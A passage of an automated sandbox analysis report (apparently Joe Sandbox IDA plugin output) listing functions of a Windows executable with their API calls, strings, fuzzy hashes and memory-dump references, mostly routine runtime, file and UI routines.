REPLACEFILEDLG, xrefs: 00007FF70E7AFF34, 00007FF70E7AFF99
RENAMEDLG, xrefs: 00007FF70E7AFF60

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction ID: c7cebe15d39d7df56d03e3fbf02b689c323bebf0005628b30fb6408247e23894
Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction Fuzzy Hash: 8021E321A09A4B90FA18EB19FC44178F3A4EF8DB88F982436DA4D47760DF7CE5948360

Function 00007FF70E7BBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF70E7BBFD0
GetProcAddress.KERNEL32 ref: 00007FF70E7BBFE6
FreeLibrary.KERNEL32 ref: 00007FF70E7BC00B

Strings

mscoree.dll, xrefs: 00007FF70E7BBFC7
CorExitProcess, xrefs: 00007FF70E7BBFDF

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction ID: 18b63580bfee2b66b18e061830b58f4e0909e1b16dff78777fe88d4a1f292515
Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction Fuzzy Hash: 01F04F21A19A4281FF49AB11FC50379E3A4AF8C7A0F846039E98F46664DF3CE4C5C720

Function 00007FF70E7C45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7C4605

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction ID: 31e3b2aacd3ce66eb914905b289d54ee39239d5d54bc43c7c73c5a7b9d274367
Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction Fuzzy Hash: FA81E422E1861245F710AB65DC506BCA6A8BF5DBA8FC46139CE1E13799EF3CE4C1C320

Function 00007FF70E793AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF70E793BBB
CreateFileW.KERNEL32 ref: 00007FF70E793C24
SetFileTime.KERNEL32 ref: 00007FF70E793CEC
CloseHandle.KERNEL32 ref: 00007FF70E793CF6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E793D2C

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
Instruction ID: 20ebaf6d23eee7001cbbe70e86c866c88d78ae422fbd37f6eb313426791bcfee
Opcode Fuzzy Hash: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
Instruction Fuzzy Hash: F551BE22B18A42A9FB54EB75EC403BDA3B1AF8D7A8F806635DE1D477D8DF3894458310

Function 00007FF70E7C3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF70E7C4767), ref: 00007FF70E7C3F91
WideCharToMultiByte.KERNEL32 ref: 00007FF70E7C406D
WriteFile.KERNEL32 ref: 00007FF70E7C4093
WriteFile.KERNEL32 ref: 00007FF70E7C40D2
GetLastError.KERNEL32 ref: 00007FF70E7C410A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction ID: c98aca14b7be7ffb4bdf70d6222fa1e29aaa8d9e0a6593e749a3a1216797eaf3
Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction Fuzzy Hash: A051D032A14A5186F710DB25E8543ACBBB4FF487A8F449139CE5E57B98DF38D086C720

Function 00007FF70E7B1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF70E794DF4), ref: 00007FF70E7B1E87
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF70E794DF4), ref: 00007FF70E7B1F09
SysAllocString.OLEAUT32 ref: 00007FF70E7B1F16

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
Instruction ID: 9beaf7400dc8bac29ec7f796856acc2e271344e03dcb559fa27f9d42d79cab43
Opcode Fuzzy Hash: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
Instruction Fuzzy Hash: AC41FB31A0A64689F714AF21DC50378A294FF5CBA4FD46634E9AD877D5DF3CE1418320

Function 00007FF70E7BF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF70E7BF536

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction ID: c8afe95e7e171b1e65221886486f95fbc161c3149f1bf62acd71a6ad013ccbd6
Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction Fuzzy Hash: 2441E522B09A4281FA19AF12EC00676E399BF6CFE0F896535DD9D4B744EF3CE4418320

Function 00007FF70E7C56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF70E7C56FF
_set_statfp.LIBCMT ref: 00007FF70E7C571A
_set_statfp.LIBCMT ref: 00007FF70E7C5736
_set_statfp.LIBCMT ref: 00007FF70E7C5772

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: e476b8585408c9fb415900c2cf386531269f2359608ec56cbde95913f9eec5c9
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: 4A119176E1CA0781F6543128ED463799149BF5D3B0FC8623CEA7E0A6D6DF2EB4C04225

Function 00007FF70E7AFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF70E7AFE41
GetMessageW.USER32 ref: 00007FF70E7AFE58
TranslateMessage.USER32 ref: 00007FF70E7AFE63
DispatchMessageW.USER32 ref: 00007FF70E7AFE6E
WaitForSingleObject.KERNEL32 ref: 00007FF70E7AFE7C

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction ID: ff0a227d9d551002a3f1327792e4154a8c6146959070519cdbdbe060aa0bdbcc
Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction Fuzzy Hash: 9DF0FF21B2854683F754A720EC55A76B251FFECB05FC82434E54E41A949F3CD589CB21

Function 00007FF70E7B625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF70E7B6286
abort.LIBCMT ref: 00007FF70E7B64EA

Strings

csm, xrefs: 00007FF70E7B62AB
csm, xrefs: 00007FF70E7B641A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction ID: f51790b796a1b684789362e7dc4af85a2654242d68f703c6d560d3dc22276e2f
Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction Fuzzy Hash: C271D172608A818ADB60AF61D85037DFBA0FF18B88F94A135DB8C0BA85CB3CD591C750

Function 00007FF70E7B80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7B811B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7B82ED

Strings

, xrefs: 00007FF70E7B8276
*, xrefs: 00007FF70E7B8221

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction ID: 979772e07fc653608de5975086651f260f0fbe532aaaa655128bae295e709a02
Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction Fuzzy Hash: 58516672D0D6468AF76CAE28C8453BC77A9FF29B18F943135C6CA45299CF3CD481C626

Function 00007FF70E7C1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF70E7C17CB
MultiByteToWideChar.KERNEL32 ref: 00007FF70E7C1894
GetStringTypeW.KERNEL32 ref: 00007FF70E7C18AE

Strings

$%s, xrefs: 00007FF70E7C175A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction ID: 0d356266a155a8db477c62f72139afd9ec2b14174ba82ad376865bdbd703945a
Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction Fuzzy Hash: 3F417422B19B8149EB61AF25DC003A9A2A5FF58BB8FC85275DE5D077C5DF3CE4858310

Function 00007FF70E7B66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7B5210: abort.LIBCMT ref: 00007FF70E7B5223

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF70E7B674A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF70E7B6776

Strings

csm, xrefs: 00007FF70E7B6876

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: 2797b92d0c1f9ee230a38d698afd7697172fed44b9c7d05685662b5fe57716bb
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: DD517E7261974187D620AB56E8413AEB7A4FB9CB90F842535EBCD07B56DF3CE450CB10

Function 00007FF70E7C4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF70E7C4446
WriteFile.KERNEL32 ref: 00007FF70E7C4479
GetLastError.KERNEL32 ref: 00007FF70E7C449B

Strings

U, xrefs: 00007FF70E7C4424

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction ID: 665b05244de610005cfcbc6c9f75baecf5dc84290a4b812ea2169b161a4fafec
Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction Fuzzy Hash: 3841F422618A8182EB209F25E8143B9B7A5FB887A4F845035EE4D87784EF3CD582C710

Function 00007FF70E7A90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF70E7A90D9
GetObjectW.GDI32 ref: 00007FF70E7A9107
ReleaseDC.USER32 ref: 00007FF70E7A91BB

Strings

, xrefs: 00007FF70E7A9153

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction ID: 6bba412bc0fa77cbec7cfe77a74aaca71ef7006f0b464454f0caa8923966d84d
Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction Fuzzy Hash: E331083561874286EA14EF12FC1862AB7A1FB8DFD9F905835ED4A43B58CF3CE4498B10

Function 00007FF70E79E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF70E7A317F,?,?,00001000,00007FF70E78E51D), ref: 00007FF70E79E8BB
CreateSemaphoreW.KERNEL32(?,?,?,00007FF70E7A317F,?,?,00001000,00007FF70E78E51D), ref: 00007FF70E79E8CB
CreateEventW.KERNEL32(?,?,?,00007FF70E7A317F,?,?,00001000,00007FF70E78E51D), ref: 00007FF70E79E8E4

Strings

Thread pool initialization failed., xrefs: 00007FF70E79E900

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction ID: 3846f4a340d4c65bb3e5fe29a7eab3c573392ba42550c4f523c962b19b6c84db
Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction Fuzzy Hash: 9E21D532E1964187F750AF34D8447A972E2EF9CB1CF58A038CA0D4A295CF7EA485C7A0

Function 00007FF70E7A85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF70E7A85EC
GetDeviceCaps.GDI32 ref: 00007FF70E7A85FD
ReleaseDC.USER32 ref: 00007FF70E7A860A

Strings

, xrefs: 00007FF70E7A8610

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

